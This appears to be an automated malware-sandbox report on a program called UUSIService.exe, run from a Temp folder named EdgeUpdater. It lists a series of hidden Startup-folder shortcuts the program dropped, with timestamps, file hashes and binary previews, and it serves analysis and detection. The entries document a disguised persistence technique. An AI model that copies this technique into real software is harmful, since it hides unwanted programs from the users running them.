Preview:	L..................F...."..............P....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S.............P........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_73fea31bd5b5428c9bc006be19364534.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:34 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.926441209843609
Encrypted:	false
SSDEEP:	24:8Z5H6Dp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8TH6Dp2l9tJRBzfNZ47/yg
MD5:	1923E5ED90CDF4A295A90C2780CCBA0C
SHA1:	BBB13C2E0DDB167A50109BA18A8D2C12ED1C8864
SHA-256:	45A565C2B257714DC506DB57A564A88EA07A7DBDEB76AB9EBC0956E032E2C6B2
SHA-512:	E0873C7CB8BD98AAF1A906C00DADD4087B65159D7C91D075E41A476CC750B22DB85CD76EC1F7E6AD8972DD25BF056F87B9BB7D03FED78AB9078C44AE5FF02A3D
Malicious:	false
Preview:	L..................F...."............M.N....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S.............N........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_7705285cf70f4826bbb43e55901766c4.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:02 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.932430520009348
Encrypted:	false
SSDEEP:	24:8ZaJ3HaDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8cJ3HaDp2l9tJRBzfNZ47/yg
MD5:	AF1D59EFE6CD31D6B9E496FBEB18E685
SHA1:	DBB0F961FAB01E72CD24734097DB424F23B42477
SHA-256:	3B0E0FCE09978CE31AEE7C4C3AF37E948A0C8C512876F15C62F3130757F05431
SHA-512:	436C649FE213976DBAA493ED676443C938250400F09B7CB764D34AB6270CDDC180ED0496189B498C750674AE84C7FD10B44E84AAF6FA78DEF3D1F30E34ED3091
Malicious:	false
Preview:	L..................F....".............,;....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........+}.;........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_77cb5acc7ba34c11b7f17e5b7c3649d7.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:36 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	modified
Size (bytes):	1193
Entropy (8bit):	4.924764763908991
Encrypted:	false
SSDEEP:	24:8ZeHyDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8oHyDp2l9tJRBzfNZ47/yg
MD5:	4E1770C0C86CD64A2D02718F6023EBF3
SHA1:	3354055B00B6528042E03C293D54D6C9DA851CC2
SHA-256:	1A4C73C080A646F09B58EC5B82E25AF6E570FF7773953A910601C996266B5BE5
SHA-512:	4868CAAAC33DE58DD973FC3BC149B75E2A5F2A762204D4BF972C3F11D46ED4A77EF46D68793C57A6EB8336F81F84EE3FD7471EFFF9BD2F7931774DFFA6FFF6F4
Malicious:	false
Preview:	L..................F...."...........`*`O....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S.............P........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_7913b0527f3d4235b6ceb5c4130d80dd.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:11 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.92736610762044
Encrypted:	false
SSDEEP:	24:8ZWXHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8QXHfNDp2l9tJRBzfNZ47/yg
MD5:	D97521AC3C17584F4585623C62290B33
SHA1:	CF6C2D187F2DFD48021D70DC927BFFB728015270
SHA-256:	191007C62E668B62CDFB0489F4D140CF00A672FFC5920D7A5F0636231415E093
SHA-512:	3935DFAC3451E02F572BEC64BDB2BFAB6B3E6DA4C74F797680E602B4C99A7FCCF5B97B6CFD46E6C517954F116B5FF2A3B3BBEC22A68F8B45EB77FDBD86810F15
Malicious:	false
Preview:	L..................F...."..................0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_7a15022c8bfb48c3b738aad3ece2b578.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:56 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.923023960988784
Encrypted:	false
SSDEEP:	24:8ZsHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8qHfNDp2l9tJRBzfNZ47/yg
MD5:	666FC837BAA4F97999022DCC6EB54955
SHA1:	5933727B7D37B8970E6EE0BDDE7D7B960C0BFD5E
SHA-256:	607054200C1997052E2CA63C4630511FAEC5B594F6A7136BEB664683ADEC99C6
SHA-512:	4D0D4CC85E97005D22C2BFCF501D7C136B335AFF17C184AB3B010332E2E8D8505393B7C2D7D76198F96165E9C562F049D9D2BCED07CCA62B4DE016F332CAE9A4
Malicious:	false
Preview:	L..................F...."...........u457....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_7d6df955870e47a68bf114653e48363d.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:47 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.92451593536945
Encrypted:	false
SSDEEP:	24:8ZAEHvDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8mEHvDp2l9tJRBzfNZ47/yg
MD5:	840DBDBED3CB6D03DE6782B2D38119D1
SHA1:	296D763355D061748D2F213EC91EB7E3F01EB780
SHA-256:	589C63214F8ED88E85F1D08889C107C55D24C647E5325F6C6B5213FA28AE2DBE
SHA-512:	71654925CFFCAD59672CC9F4FD8B4DA57FD5CF0687F690FB397D2BF57D00FE885EAB54801FA97155D3092E88436B1B6530795F06E8669C528F6C9CFFC537E467
Malicious:	false
Preview:	L..................F...."..........."~.U....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S............FV........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_7df32232a441418d80f94208b11e795c.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:08 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.924459208186778
Encrypted:	false
SSDEEP:	24:8ZdHuDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8DHuDp2l9tJRBzfNZ47/yg
MD5:	4010169BDBE988F3875FA6ECA965148B
SHA1:	83C8153EE25639D31358C3950D883F09D9B465C6
SHA-256:	ED31E55CB816ACABBA424F82755C528B1B95C0000C886657ABF9A90F73523FC1
SHA-512:	824F435165D9F712E5E61A796F2B63CB6C4DDB5F6DCF821E8FDFA6443E9DDA673338D9E064DE0ACBC79D43FF98CE5938950EEFCA5D3354C43DD4CBD5FEE380E7
Malicious:	false
Preview:	L..................F...."............P.>....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........*s.=........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_8074e68c47104af2bbfd9be7bd9b39ba.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:44 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.91983603650792
Encrypted:	false
SSDEEP:	24:8ZRHLSDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8HHLSDp2l9tJRBzfNZ47/yg
MD5:	9C7612CCB9F529774DD275858D28EF2F
SHA1:	E24CD7183A265A147C321932882E05177D3B1B96
SHA-256:	BA462A96CAC73C957ACE8CCDD16D674DE52A1D0DD2FC4A8CA41102E1F2367D5A
SHA-512:	0ADD3482D58C67AF1E2881FC74FF0820F4F400A599DF1FA02775221116F12F5C15A85C2CC7BB65478D3FD1942BB653A29C6A0BAB319B0B92CF3078592E4F82FF
Malicious:	false
Preview:	L..................F...."..............S....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S............%S........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_8a66772f7aad4e4fae9a833c748bc8a0.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:27 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.922792740311708
Encrypted:	false
SSDEEP:	24:8ZyHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:84HfNDp2l9tJRBzfNZ47/yg
MD5:	4AD60036F1C8E60F1E3822D80BED43DF
SHA1:	AE9F06EE381638E6F8CC5549A3D40FC514FBC7FA
SHA-256:	3BD2DF78B73344A5F36B2258DE9A59F7657F91F8133C7E72AB06A248A54517B2
SHA-512:	529420DC7B0F23875EB3B81A44BC0CBED27DBA517717FEDEF3D40EC39DA01AB57B681E488C0B6C4C36AB9F72B40081D41D726BAB41220B862B34E09AA56EE602
Malicious:	false
Preview:	L..................F...."............r8&....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_8c19d81d27cf49499645d8fde1085e62.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:17:55 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.925232408942185
Encrypted:	false
SSDEEP:	24:8ZlHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8HHfNDp2l9tJRBzfNZ47/yg
MD5:	4B140FCB47445E75E989E5BBC980B3F5
SHA1:	AAF12FC5B7438F8F576F528CD1E7CD3125800697
SHA-256:	B1F6D1E16915B04EAAA156BCBEFE8BA74F48B6FDB65ED87DF7D00209F7033390
SHA-512:	6C8DCF62837C08A477CE0FD124465D9435DB3AF94863C623CF8D027DEDB9C7533CD160007D3E9B7F344BE19E3B8B7FBA0DC3D551D7469E2D0FB193AF85C0ECF0
Malicious:	false
Preview:	L..................F....".............1.....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_8e2b9cb806034df8ad8ff6173a35ed5e.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:17:55 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.924645979793251
Encrypted:	false
SSDEEP:	24:8ZSwHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:85HfNDp2l9tJRBzfNZ47/yg
MD5:	60176436B0C948DF76912139A20AFB7A
SHA1:	AFB858FAFBD38B12D29E9CE2E4D729CDF8706BA3
SHA-256:	856D6333F7031B4A43B46E7BA8DA4996387FFACA4A7FFC4DC49BA8CD2086A242
SHA-512:	7C047458FAA5477A62AF8B78444395FF54255EC4C5601EFC5A5EDA609A6F8A307CC4345D4B43896AEEBCADE5F260662FE09754A1FAD05DA6DC7C7B221918EA62
Malicious:	false
Preview:	L..................F...."...........fC......0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_905bba77717b4267976905fa6260424d.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:21 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.922220285753368
Encrypted:	false
SSDEEP:	24:8ZBLHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8zHfNDp2l9tJRBzfNZ47/yg
MD5:	BAA892D216554AF0223A4DC6C08BC9F4
SHA1:	326ACEFBED6578BB9D98C8D4BC08EB2C3A172F0B
SHA-256:	66093B5381D1761C25805DF9E98F6FEE6CFFB8746CE775A28CF8908B389A582C
SHA-512:	CFDEC14F66AA792E727C03E8B0E8736CD430B379BD76AF22217C7289909ECB6389DE31A28FF321FA05F1460054F006C53524922EC3476A5147D15692C8EE9872
Malicious:	false
Preview:	L..................F...."............t."....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_906d1686ddbf4967b46575de2621d86d.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:17:46 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.923119948631545
Encrypted:	false
SSDEEP:	24:8ZJHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:83HfNDp2l9tJRBzfNZ47/yg
MD5:	D82AB67C18285D39ABB9788101D5118C
SHA1:	30E5C9804199315A45A052E484D3ADF2D90E23C5
SHA-256:	5ED787D1ACAFA430E624F47842969B0D53E2B9F42E980AEFBB5C17D09B4A11DC
SHA-512:	DF7F5AEC035C62D33D570C2B36FA203E7E14E29DB463DFF693238ABA8F62AAFB1C0A4392A7F6B85F5E6099CDA853798060DE536907808872A71445669B60FF86
Malicious:	false
